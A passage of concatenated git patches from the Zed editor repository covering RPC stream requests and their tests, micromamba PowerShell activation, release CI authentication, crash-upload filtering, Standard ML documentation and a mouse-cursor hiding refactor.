"incoming stream response: request future dropped", ); + // The consumer has gone away, so drop the bookkeeping + // for this stream rather than letting it accumulate + // every subsequent message until a terminal frame. + if let Some(channels) = stream_response_channels.lock().as_mut() { + channels.remove(&responding_to); + } + } else { + let _ = requester_resumed.1.await; } - - tracing::debug!( - %connection_id, - message_id, - responding_to, - "incoming stream response: waiting to resume requester" - ); - let _ = requester_resumed.1.await; - tracing::debug!( - %connection_id, - message_id, - responding_to, - "incoming stream response: requester resumed" - ); } else { let message_type = proto::build_typed_envelope( connection_id.into(), @@ -484,55 +490,96 @@ impl Peer { &self, receiver_id: ConnectionId, request: T, - ) -> impl Future>>> { + ) -> impl Future>>> { + let stream = + self.request_stream_dynamic(receiver_id, request.into_envelope(0, None, None), T::NAME); + + async move { + Ok(stream + .await? + .map(|response| { + T::Response::from_envelope(response?) + .context("received response of the wrong type") + }) + .boxed()) + } + } + + pub fn request_stream_dynamic( + &self, + receiver_id: ConnectionId, + mut envelope: proto::Envelope, + request_type: &'static str, + ) -> impl Future>>> + use<> { let (tx, rx) = mpsc::unbounded(); let send = self.connection_state(receiver_id).and_then(|connection| { let message_id = connection.next_message_id.fetch_add(1, SeqCst); + envelope.id = message_id; let stream_response_channels = connection.stream_response_channels.clone(); stream_response_channels .lock() .as_mut() .context("connection was closed")? .insert(message_id, tx); - connection + if let Err(error) = connection .outgoing_tx - .unbounded_send(Message::Envelope( - request.into_envelope(message_id, None, None), - )) - .context("connection was closed")?; + .unbounded_send(Message::Envelope(envelope)) + { + if let Some(channels) = stream_response_channels.lock().as_mut() { + channels.remove(&message_id); + } + return Err(error).context("connection was closed"); + } Ok((message_id, stream_response_channels)) }); async move { let (message_id, stream_response_channels) = send?; let stream_response_channels = Arc::downgrade(&stream_response_channels); - - Ok(rx.filter_map(move |(response, _barrier)| { + let cleanup_stream_response_channel = util::defer({ let stream_response_channels = stream_response_channels.clone(); - future::ready(match response { - Ok(response) => { - if let Some(proto::envelope::Payload::Error(error)) = &response.payload { - Some(Err(RpcError::from_proto(error, T::NAME))) - } else if let Some(proto::envelope::Payload::EndStream(_)) = - &response.payload - { - // Remove the transmitting end of the response channel to end the stream. - if let Some(channels) = stream_response_channels.upgrade() - && let Some(channels) = channels.lock().as_mut() + move || { + if let Some(channels) = stream_response_channels.upgrade() + && let Some(channels) = channels.lock().as_mut() + { + channels.remove(&message_id); + } + } + }); + + Ok(rx + .filter_map(move |(response, _barrier)| { + let _keep_cleanup_guard_alive = &cleanup_stream_response_channel; + let stream_response_channels = stream_response_channels.clone(); + future::ready(match response { + Ok(response) => { + if let Some(proto::envelope::Payload::Error(error)) = &response.payload { - channels.remove(&message_id); + // Remove the transmitting end of the response channel to end the stream. + if let Some(channels) = stream_response_channels.upgrade() + && let Some(channels) = channels.lock().as_mut() + { + channels.remove(&message_id); + } + Some(Err(RpcError::from_proto(error, request_type))) + } else if let Some(proto::envelope::Payload::EndStream(_)) = + &response.payload + { + // Remove the transmitting end of the response channel to end the stream. + if let Some(channels) = stream_response_channels.upgrade() + && let Some(channels) = channels.lock().as_mut() + { + channels.remove(&message_id); + } + None + } else { + Some(Ok(response)) } - None - } else { - Some( - T::Response::from_envelope(response) - .context("received response of the wrong type"), - ) } - } - Err(error) => Some(Err(error)), + Err(error) => Some(Err(error)), + }) }) - })) + .boxed()) } } @@ -661,6 +708,13 @@ impl Peer { .with_context(|| format!("no such connection: {connection_id}"))?; Ok(connection.clone()) } + + #[cfg(any(test, feature = "test-support"))] + pub fn pending_stream_request_count(&self, connection_id: ConnectionId) -> Option { + let connection = self.connection_state(connection_id).ok()?; + let channels = connection.stream_response_channels.lock(); + Some(channels.as_ref()?.len()) + } } impl Serialize for Peer { @@ -992,6 +1046,268 @@ mod tests { ); } + #[gpui::test(iterations = 50)] + async fn test_request_stream(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let server = Peer::new(0); + let client = Peer::new(0); + + let (client_to_server_conn, server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task1, mut client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + let (_, io_task2, mut server_incoming) = + server.add_test_connection(server_to_client_conn, executor.clone()); + + executor.spawn(io_task1).detach(); + executor.spawn(io_task2).detach(); + executor + .spawn(async move { while client_incoming.next().await.is_some() {} }) + .detach(); + + executor + .spawn({ + let server = server.clone(); + async move { + let request = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + let receipt = request.receipt(); + server.respond(receipt, proto::Test { id: 1 }).unwrap(); + server.respond(receipt, proto::Test { id: 2 }).unwrap(); + server.respond(receipt, proto::Test { id: 3 }).unwrap(); + server.end_stream(receipt).unwrap(); + + // Prevent the connection from being dropped. + server_incoming.next().await; + } + }) + .detach(); + + let mut stream = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await + .unwrap(); + + let mut received = Vec::new(); + while let Some(item) = stream.next().await { + received.push(item.unwrap()); + } + + assert_eq!( + received, + vec![ + proto::Test { id: 1 }, + proto::Test { id: 2 }, + proto::Test { id: 3 }, + ] + ); + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0) + ); + } + + #[gpui::test] + async fn test_request_stream_send_failure_cleans_up_response_channel(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let client = Peer::new(0); + + let (client_to_server_conn, _server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task, _client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + + drop(io_task); + + let result = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await; + + assert!( + result.is_err(), + "stream request should fail when the connection write task has gone away" + ); + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0), + "failed stream request should not leave response channel bookkeeping behind" + ); + } + + #[gpui::test(iterations = 50)] + async fn test_request_stream_terminates_on_error(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let server = Peer::new(0); + let client = Peer::new(0); + + let (client_to_server_conn, server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task1, mut client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + let (_, io_task2, mut server_incoming) = + server.add_test_connection(server_to_client_conn, executor.clone()); + + executor.spawn(io_task1).detach(); + executor.spawn(io_task2).detach(); + executor + .spawn(async move { while client_incoming.next().await.is_some() {} }) + .detach(); + + executor + .spawn({ + let server = server.clone(); + async move { + let request = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + let receipt = request.receipt(); + server.respond(receipt, proto::Test { id: 1 }).unwrap(); + // Send an Error without a trailing EndStream. The Error alone + // should be treated as a terminal stream response. + server + .respond_with_error( + receipt, + ErrorCode::Internal.message("boom".to_string()).to_proto(), + ) + .unwrap(); + + // Prevent the connection from being dropped. + server_incoming.next().await; + } + }) + .detach(); + + let mut stream = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await + .unwrap(); + + assert_eq!(stream.next().await.unwrap().unwrap(), proto::Test { id: 1 }); + + let error = stream.next().await.unwrap().unwrap_err(); + assert!( + format!("{error}").contains("boom"), + "expected error to surface server message, got: {error}" + ); + + // The error alone (without an EndStream) should terminate the stream. + assert!(stream.next().await.is_none()); + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0) + ); + } + + #[gpui::test(iterations = 50)] + async fn test_dropping_stream_request_before_completion(cx: &mut TestAppContext) { + init_logger(); + + let executor = cx.executor(); + let server = Peer::new(0); + let client = Peer::new(0); + + let (client_to_server_conn, server_to_client_conn, _kill) = + Connection::in_memory(executor.clone()); + let (client_to_server_conn_id, io_task1, mut client_incoming) = + client.add_test_connection(client_to_server_conn, executor.clone()); + let (_, io_task2, mut server_incoming) = + server.add_test_connection(server_to_client_conn, executor.clone()); + + executor.spawn(io_task1).detach(); + executor.spawn(io_task2).detach(); + executor + .spawn(async move { while client_incoming.next().await.is_some() {} }) + .detach(); + + let (drop_signal_tx, drop_signal_rx) = oneshot::channel::<()>(); + let server_task = executor.spawn({ + let server = server.clone(); + async move { + let request = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + let receipt = request.receipt(); + server.respond(receipt, proto::Test { id: 1 }).unwrap(); + + // Wait until the consumer has dropped the stream. + drop_signal_rx.await.ok(); + + // Send a non-terminal response after the consumer is gone. The + // peer should detect that the receiver has been dropped and clean + // up its bookkeeping. Crucially, we do NOT send EndStream here + // because that would clean up via the terminal-response path and + // mask the bug. + server.respond(receipt, proto::Test { id: 2 }).unwrap(); + + // A Ping/Ack round-trip after the response acts as a sync + // barrier: because messages over the in-memory connection are + // delivered in order, by the time the client observes the Ack, + // it has already processed the dropped response above. + let ping = server_incoming + .next() + .await + .unwrap() + .into_any() + .downcast::>() + .unwrap(); + server.respond(ping.receipt(), proto::Ack {}).unwrap(); + + // Prevent the connection from being dropped. + server_incoming.next().await; + } + }); + + let mut stream = client + .request_stream(client_to_server_conn_id, proto::Test { id: 0 }) + .await + .unwrap(); + + assert_eq!(stream.next().await.unwrap().unwrap(), proto::Test { id: 1 }); + + // The stream is mid-flight, so the channel should be tracked. + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(1) + ); + + drop(stream); + drop_signal_tx.send(()).ok(); + + // Synchronization barrier: once this Ack arrives, the read loop has + // already processed the orphaned stream response that came before it. + client + .request(client_to_server_conn_id, proto::Ping {}) + .await + .unwrap(); + + assert_eq!( + client.pending_stream_request_count(client_to_server_conn_id), + Some(0), + "stream channel should be removed once the consumer has dropped the stream" + ); + + drop(server_task); + } + #[gpui::test(iterations = 50)] async fn test_disconnect(cx: &mut TestAppContext) { let executor = cx.executor(); diff --git a/crates/rpc/src/proto_client.rs b/crates/rpc/src/proto_client.rs index ba8b8782725936..cb45948d5cd9b1 100644 --- a/crates/rpc/src/proto_client.rs +++ b/crates/rpc/src/proto_client.rs @@ -1,9 +1,10 @@ use anyhow::{Context, Result}; use collections::HashMap; use futures::{ - Future, FutureExt as _, + Future, FutureExt as _, Stream, StreamExt as _, channel::oneshot, future::{BoxFuture, LocalBoxFuture}, + stream::BoxStream, }; use gpui::{AnyEntity, AnyWeakEntity, AsyncApp, BackgroundExecutor, Entity, FutureExt as _}; use parking_lot::Mutex; @@ -61,6 +62,20 @@ pub trait ProtoClient: Send + Sync { request_type: &'static str, ) -> BoxFuture<'static, Result>; + fn request_stream( + &self, + envelope: Envelope, + request_type: &'static str, + ) -> BoxFuture<'static, Result>>> { + async move { + anyhow::bail!( + "stream requests are not supported for {request_type}: {:?}", + envelope.payload + ) + } + .boxed() + } + fn send(&self, envelope: Envelope, message_type: &'static str) -> Result<()>; fn send_response(&self, envelope: Envelope, message_type: &'static str) -> Result<()>; @@ -223,6 +238,23 @@ impl AnyProtoClient { } } + pub fn request_stream( + &self, + request: T, + ) -> impl Future>>> + use { + let envelope = request.into_envelope(0, None, None); + let response_stream = self.0.client.request_stream(envelope, T::NAME); + async move { + Ok(response_stream + .await? + .map(|response| { + T::Response::from_envelope(response?) + .context("received response of the wrong type") + }) + .boxed()) + } + } + pub fn send(&self, request: T) -> Result<()> { let envelope = request.into_envelope(0, None, None); self.0.client.send(envelope, T::NAME) @@ -479,6 +511,68 @@ impl AnyProtoClient { ); } + pub fn add_entity_stream_request_handler(&self, handler: H) + where + M: EnvelopedMessage + RequestMessage + EntityMessage, + E: 'static, + H: 'static + Sync + Send + Fn(gpui::Entity, TypedEnvelope, AsyncApp) -> F, + F: 'static + Future>, + S: 'static + Stream>, + { + let message_type_id = TypeId::of::(); + let entity_type_id = TypeId::of::(); + let entity_id_extractor = |envelope: &dyn AnyTypedEnvelope| { + (envelope as &dyn Any) + .downcast_ref::>() + .unwrap() + .payload + .remote_entity_id() + }; + self.0 + .client + .message_handler_set() + .lock() + .add_entity_message_handler( + message_type_id, + entity_type_id, + entity_id_extractor, + Arc::new(move |entity, envelope, client, cx| { + let entity = entity.downcast::().unwrap(); + let envelope = envelope.into_any().downcast::>().unwrap(); + let request_id = envelope.message_id(); + let stream = handler(entity, *envelope, cx); + async move { + // An Error response is itself a terminal stream frame on + // both transports (Peer and ChannelClient), so we don't + // need to follow it with an EndStream. + match stream.await { + Ok(stream) => { + futures::pin_mut!(stream); + while let Some(result) = stream.next().await { + match result { + Ok(response) => { + client.send_response(request_id, response)? + } + Err(error) => { + client.send_response(request_id, error.to_proto())?; + return Err(error); + } + } + } + client.send_response(request_id, proto::EndStream {})?; + Ok(()) + } + Err(error) => { + client.send_response(request_id, error.to_proto())?; + Err(error) + } + } + } + .boxed_local() + }), + ); + } + pub fn add_entity_message_handler(&self, handler: H) where M: EnvelopedMessage + EntityMessage, From 098960eca0b386b3d05b004b6ccd040d4166d5c3 Mon Sep 17 00:00:00 2001 From: Adam Ehlers Nyholm Thomsen Date: Mon, 4 May 2026 18:44:18 +0200 Subject: [PATCH 170/231] Fix micromamba powershell activation (#55643) Powershell does not support eval, furthermore pwsh is also a "powershell" shell for micromamba. Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - Fixes micromamba powershell activation --- crates/languages/src/python.rs | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/crates/languages/src/python.rs b/crates/languages/src/python.rs index 5cdff8654ff6b9..26e96789a0d4b6 100644 --- a/crates/languages/src/python.rs +++ b/crates/languages/src/python.rs @@ -1259,7 +1259,7 @@ fn micromamba_shell_name(kind: ShellKind) -> &'static str { ShellKind::Csh => "csh", ShellKind::Fish => "fish", ShellKind::Nushell => "nu", - ShellKind::PowerShell => "powershell", + ShellKind::PowerShell | ShellKind::Pwsh => "powershell", ShellKind::Cmd => "cmd.exe", // default / catch-all: _ => "posix", @@ -1470,9 +1470,17 @@ impl ToolchainLister for PythonToolchainProvider { // Activate micromamba shell in the child shell // [required for micromamba] if manager == "micromamba" { - let shell = micromamba_shell_name(shell); - activation_script - .push(format!(r#"eval "$({manager} shell hook --shell {shell})""#)); + match shell { + ShellKind::PowerShell | ShellKind::Pwsh => { + activation_script.push(format!(r#"(& {manager} shell hook --shell powershell) | Out-String | Invoke-Expression"#)); + } + _ => { + let shell_name = micromamba_shell_name(shell); + activation_script.push(format!( + r#"eval "$({manager} shell hook --shell {shell_name})""# + )); + } + } } if let Some(name) = &toolchain.environment.name { From c87a57f5a0cd6bfe3cbeea817fa8b1c2b944c833 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Mon, 4 May 2026 18:49:23 +0200 Subject: [PATCH 171/231] ci: Create releases with the Zed Zippy identity (#55649) Just a small QoL, the change here will make it so that under https://github.com/zed-industries/zed/releases/tag/v1.0.1 the releases will show as created by zed-zippy and not github-actions. Release Notes: - N/A --- .github/workflows/release.yml | 9 ++++++++- tooling/xtask/src/tasks/workflows/release.rs | 15 ++++++++++----- 2 files changed, 18 insertions(+), 6 deletions(-) diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 05a28ec9c49685..a2a779dc14fe11 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -274,6 +274,13 @@ jobs: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-2x4-ubuntu-2404 steps: + - id: generate-token + name: steps::authenticate_as_zippy + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 + with: + app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} + private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + permission-contents: write - name: steps::checkout_repo uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: @@ -289,7 +296,7 @@ jobs: - name: release::create_draft_release::create_release run: script/create-draft-release target/release-notes.md env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} timeout-minutes: 60 compliance_check: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') diff --git a/tooling/xtask/src/tasks/workflows/release.rs b/tooling/xtask/src/tasks/workflows/release.rs index 717bf8786b675a..94db5508f80fe2 100644 --- a/tooling/xtask/src/tasks/workflows/release.rs +++ b/tooling/xtask/src/tasks/workflows/release.rs @@ -1,11 +1,11 @@ -use gh_workflow::{Event, Expression, Push, Run, Step, Use, Workflow, ctx::Context}; +use gh_workflow::{Event, Expression, Level, Push, Run, Step, Use, Workflow, ctx::Context}; use indoc::formatdoc; use crate::tasks::workflows::{ run_bundling::{bundle_linux, bundle_mac, bundle_windows, upload_artifact}, run_tests, runners::{self, Arch, Platform}, - steps::{self, FluentBuilder, NamedJob, dependant_job, named, release_job}, + steps::{self, FluentBuilder, NamedJob, TokenPermissions, dependant_job, named, release_job}, vars::{self, JobOutput, StepOutput, assets}, }; @@ -471,11 +471,15 @@ fn create_draft_release() -> NamedJob { ) } - fn create_release() -> Step { + fn create_release(token: StepOutput) -> Step { named::bash("script/create-draft-release target/release-notes.md") - .add_env(("GITHUB_TOKEN", vars::GITHUB_TOKEN)) + .add_env(("GITHUB_TOKEN", token.to_string())) } + let (authenticate_step, token) = steps::authenticate_as_zippy() + .with_permissions([(TokenPermissions::Contents, Level::Write)]) + .into(); + named::job( release_job(&[]) .runs_on(runners::LINUX_SMALL) @@ -483,6 +487,7 @@ fn create_draft_release() -> NamedJob { // is able to diff between the current and previous tag. // // 25 was chosen arbitrarily. + .add_step(authenticate_step) .add_step( steps::checkout_repo() .with_custom_fetch_depth(25) @@ -491,7 +496,7 @@ fn create_draft_release() -> NamedJob { .add_step(steps::script("script/determine-release-channel")) .add_step(steps::script("mkdir -p target/")) .add_step(generate_release_notes()) - .add_step(create_release()), + .add_step(create_release(token)), ) } From 271835c464032a195e41f1d207f14072ce96c402 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 20:44:05 +0200 Subject: [PATCH 172/231] zed: Do not upload crashes that lack an associated release (#55605) We will not have any debug data for these anyways (and usually this indicates someone else made a built that somehow points to our sentry endpoint ...) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/zed/src/reliability.rs | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/crates/zed/src/reliability.rs b/crates/zed/src/reliability.rs index e6c3821507cffb..b74cdebbacd5e5 100644 --- a/crates/zed/src/reliability.rs +++ b/crates/zed/src/reliability.rs @@ -266,6 +266,10 @@ async fn upload_minidump( minidump: Vec, metadata: &crashes::CrashInfo, ) -> Result<()> { + if metadata.init.commit_sha == "no sha" { + log::warn!("No commit sha set, skipping minidump upload"); + return Ok(()); + } let mut form = Form::new() .part( "upload_file_minidump", From 05b54117c3738d11697ff1db73694a82314c57ba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tom=20Houl=C3=A9?= <13155277+tomhoule@users.noreply.github.com> Date: Mon, 4 May 2026 21:08:24 +0200 Subject: [PATCH 173/231] client: Pass x-zed-system-id header in get_authenticated_user() (#55688) We are going to drive current organization selection with server side state, so we need to know which installation we are on so the server can return the correct currently selected organization. Next step will be using the organization from the response and removing the locally persisted current organization id. Part of CLO-716 Release Notes: - N/A --- crates/client/src/user.rs | 14 ++++++++++---- crates/cloud_api_client/src/cloud_api_client.rs | 15 ++++++++++----- 2 files changed, 20 insertions(+), 9 deletions(-) diff --git a/crates/client/src/user.rs b/crates/client/src/user.rs index ff4450f2697a70..0f43690491387e 100644 --- a/crates/client/src/user.rs +++ b/crates/client/src/user.rs @@ -229,9 +229,11 @@ impl UserStore { | Status::Reauthenticated | Status::Connected { .. } => { if let Some(user_id) = client.user_id() { + let system_id = + client.telemetry().system_id().map(|id| id.to_string()); let response = client .cloud_client() - .get_authenticated_user() + .get_authenticated_user(system_id) .await .log_err(); @@ -912,15 +914,19 @@ impl UserStore { cx.spawn(async move |cx| { match message { MessageToClient::UserUpdated => { - let cloud_client = cx + let (cloud_client, system_id) = cx .update(|cx| { this.read_with(cx, |this, _cx| { - this.client.upgrade().map(|client| client.cloud_client()) + this.client.upgrade().map(|client| { + let system_id = + client.telemetry().system_id().map(|id| id.to_string()); + (client.cloud_client(), system_id) + }) }) })? .ok_or(anyhow::anyhow!("Failed to get Cloud client"))?; - let response = cloud_client.get_authenticated_user().await?; + let response = cloud_client.get_authenticated_user(system_id).await?; cx.update(|cx| { this.update(cx, |this, cx| { this.update_authenticated_user(response, cx); diff --git a/crates/cloud_api_client/src/cloud_api_client.rs b/crates/cloud_api_client/src/cloud_api_client.rs index 8c605bb3490ef5..43814e3b229fa0 100644 --- a/crates/cloud_api_client/src/cloud_api_client.rs +++ b/crates/cloud_api_client/src/cloud_api_client.rs @@ -74,15 +74,20 @@ impl CloudApiClient { pub async fn get_authenticated_user( &self, + system_id: Option, ) -> Result { - let request = self.build_request( - Request::builder().method(Method::GET).uri( + let request_builder = Request::builder() + .method(Method::GET) + .uri( self.http_client .build_zed_cloud_url("/client/users/me")? .as_ref(), - ), - AsyncBody::default(), - )?; + ) + .when_some(system_id, |builder, system_id| { + builder.header(ZED_SYSTEM_ID_HEADER_NAME, system_id) + }); + + let request = self.build_request(request_builder, AsyncBody::default())?; let mut response = self.http_client.send(request).await?; From 324f3c29349ac8131c23a111876ef290db84c1f3 Mon Sep 17 00:00:00 2001 From: Dzming Li Date: Tue, 5 May 2026 06:07:14 +0800 Subject: [PATCH 174/231] docs: Add Standard ML to community language extensions list (#55695) Adds the Standard ML community extension ([omarjatoi/zed-sml](https://github.com/omarjatoi/zed-sml)) to `docs/src/languages.md`. It is already published in the Zed extension registry ([zed.dev/extensions/sml](https://zed.dev/extensions/sml)) and provides Tree-sitter highlighting plus Millet LSP integration, but is currently missing from the language documentation page. Release Notes: - N/A --- docs/src/SUMMARY.md | 1 + docs/src/languages.md | 1 + docs/src/languages/sml.md | 28 ++++++++++++++++++++++++++++ 3 files changed, 30 insertions(+) create mode 100644 docs/src/languages/sml.md diff --git a/docs/src/SUMMARY.md b/docs/src/SUMMARY.md index 68542f285ac4ee..a3b8ce32ea52ba 100644 --- a/docs/src/SUMMARY.md +++ b/docs/src/SUMMARY.md @@ -139,6 +139,7 @@ - [Scheme](./languages/scheme.md) - [Shell Script](./languages/sh.md) - [SQL](./languages/sql.md) +- [Standard ML](./languages/sml.md) - [Svelte](./languages/svelte.md) - [Swift](./languages/swift.md) - [Tailwind CSS](./languages/tailwindcss.md) diff --git a/docs/src/languages.md b/docs/src/languages.md index f1145a704b143e..4b96e551cedab4 100644 --- a/docs/src/languages.md +++ b/docs/src/languages.md @@ -66,6 +66,7 @@ Some work out-of-the box and others rely on 3rd party extensions. - [Scala](./languages/scala.md) - [Scheme](./languages/scheme.md) - [Shell Script](./languages/sh.md) +- [Standard ML](./languages/sml.md) - [Svelte](./languages/svelte.md) - [Swift](./languages/swift.md) - [Tailwind CSS](./languages/tailwindcss.md) \* diff --git a/docs/src/languages/sml.md b/docs/src/languages/sml.md new file mode 100644 index 00000000000000..2077f05dc982eb --- /dev/null +++ b/docs/src/languages/sml.md @@ -0,0 +1,28 @@ +--- +title: Standard ML +description: "Configure Standard ML language support in Zed, including language servers, formatting, and debugging." +--- + +# Standard ML + +Standard ML support is available through the community-maintained [Standard ML extension](https://github.com/omarjatoi/zed-sml). + +- Tree-sitter: [MatthewFluet/tree-sitter-sml](https://github.com/MatthewFluet/tree-sitter-sml) +- Language Server: [Millet](https://github.com/azdavis/millet) + +## Setup + +1. Install a Standard ML implementation such as [SML/NJ](https://www.smlnj.org/) or [MLton](http://mlton.org/) to compile and run your code. +2. [Install Millet](https://github.com/azdavis/millet#install) and ensure `millet-ls` is on your `$PATH`. + +## Project setup + +For projects with more than one source file, Millet expects a single root group file. Create a `millet.toml` in the directory you open in Zed: + +```toml +version = 1 +[workspace] +root = "sources.mlb" +``` + +The root must be either a [ML Basis (MLB)](http://mlton.org/MLBasis) file (`.mlb`, used with MLton) or a [SML/NJ Compilation Manager (CM)](https://www.smlnj.org/doc/CM/new.pdf) file (`.cm`, used with SML/NJ). Files not transitively reachable from the root are not analyzed. See the [Millet manual](https://github.com/azdavis/millet/blob/main/docs/manual.md) for more options. From 7d439b880ab90022954e01db984d39d81cc3aec6 Mon Sep 17 00:00:00 2001 From: George Waters Date: Mon, 4 May 2026 18:24:24 -0400 Subject: [PATCH 175/231] Add show line endings button to Settings UI (#55707) This is following up from #39609 to add the line endings button setting into settings ui. Release Notes: - Added the line endings button setting to settings ui. --- crates/settings_ui/src/page_data.rs | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 112aa5f5716563..a43c566d1a7524 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -3487,7 +3487,7 @@ fn search_and_files_page() -> SettingsPage { } fn window_and_layout_page() -> SettingsPage { - fn status_bar_section() -> [SettingsPageItem; 10] { + fn status_bar_section() -> [SettingsPageItem; 11] { [ SettingsPageItem::SectionHeader("Status Bar"), SettingsPageItem::SettingItem(SettingItem { @@ -3574,6 +3574,28 @@ fn window_and_layout_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Line Endings Button", + description: "Show the active line endings button in the status bar.", + field: Box::new(SettingField { + json_path: Some("status_bar.line_endings_button"), + pick: |settings_content| { + settings_content + .status_bar + .as_ref()? + .line_endings_button + .as_ref() + }, + write: |settings_content, value, _| { + settings_content + .status_bar + .get_or_insert_default() + .line_endings_button = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Terminal Button", description: "Show the terminal button in the status bar.", From d411289e279bfc5918c79631185d1a41d209d81d Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Mon, 4 May 2026 19:51:56 -0300 Subject: [PATCH 176/231] Handle hiding cursor on keyboard input at GPUI level (#55664) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Instead of manually handing hiding the cursor on keyboard input at the editor level, GPUI will now take care of it. This makes it significantly easier to handle the edge cases, and allows delegating the cursor restoration to the platform itself in the macOS case. On Linux and Windows, we still have to restore the cursor on movement ourselves, but this now happens at the platform-specific level. Bugs fixed by this change: - No cursor when "Unsaved edits" prompt appears - Cursor disappears when clicking a panel button if it contains a search bar (e.g. collab panel) ### Setting rename The `hide_mouse` setting value `"on_typing_and_movement"` has been renamed to `"on_typing_and_action"` to better reflect what it actually does — it hides the cursor when a keystroke resolves to an action (e.g. cursor movement, deletion). Existing settings are migrated automatically. ### Tested platforms - [x] macOS - [x] Wayland - [x] X11 - [x] Windows - [x] Web Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Renamed the `hide_mouse` setting value `on_typing_and_movement` to `on_typing_and_action` to better describe its behavior (existing settings are auto-migrated) - Fixed a few situations where the mouse cursor would be incorrectly hidden --- assets/settings/default.json | 9 +- crates/editor/src/editor.rs | 191 +----------------- crates/editor/src/editor_settings.rs | 7 +- crates/editor/src/element.rs | 5 +- crates/editor/src/hover_links.rs | 32 +-- crates/gpui/src/app.rs | 39 ++++ crates/gpui/src/platform.rs | 11 +- crates/gpui/src/platform/test/platform.rs | 6 + crates/gpui/src/platform/visual_test.rs | 8 + crates/gpui/src/window.rs | 59 ++++-- crates/gpui_linux/src/linux/platform.rs | 18 +- crates/gpui_linux/src/linux/wayland.rs | 6 - crates/gpui_linux/src/linux/wayland/client.rs | 134 +++++++++--- crates/gpui_linux/src/linux/x11/client.rs | 149 +++++++++++--- crates/gpui_macos/src/platform.rs | 33 ++- crates/gpui_macos/src/window.rs | 71 ++----- crates/gpui_macros/src/styles.rs | 6 - crates/gpui_web/src/platform.rs | 107 +++++++++- crates/gpui_windows/src/events.rs | 27 ++- crates/gpui_windows/src/platform.rs | 30 +++ crates/gpui_windows/src/util.rs | 1 - crates/gpui_windows/src/window.rs | 8 + crates/migrator/src/migrations.rs | 6 + .../src/migrations/m_2026_05_04/settings.rs | 38 ++++ crates/migrator/src/migrator.rs | 44 ++++ crates/settings/src/vscode_import.rs | 2 +- crates/settings_content/src/editor.rs | 32 --- .../settings_content/src/settings_content.rs | 36 ++++ crates/settings_ui/src/page_data.rs | 4 +- crates/vim/src/helix.rs | 5 +- crates/vim/src/vim.rs | 8 +- crates/zed/src/zed.rs | 21 ++ docs/src/reference/all-settings.md | 9 +- docs/src/visual-customization.md | 4 +- 34 files changed, 716 insertions(+), 450 deletions(-) create mode 100644 crates/migrator/src/migrations/m_2026_05_04/settings.rs diff --git a/assets/settings/default.json b/assets/settings/default.json index 54b9070da2be39..cd2e164dfb0de5 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -230,15 +230,16 @@ // // Default: "bar" "cursor_shape": "bar", - // Determines when the mouse cursor should be hidden in an editor or input box. + // Determines when the mouse cursor should be hidden in response to keyboard + // input. // // 1. Never hide the mouse cursor: // "never" // 2. Hide only when typing: // "on_typing" - // 3. Hide on both typing and cursor movement: - // "on_typing_and_movement" - "hide_mouse": "on_typing_and_movement", + // 3. Hide on typing and on key bindings that resolve to an action: + // "on_typing_and_action" + "hide_mouse": 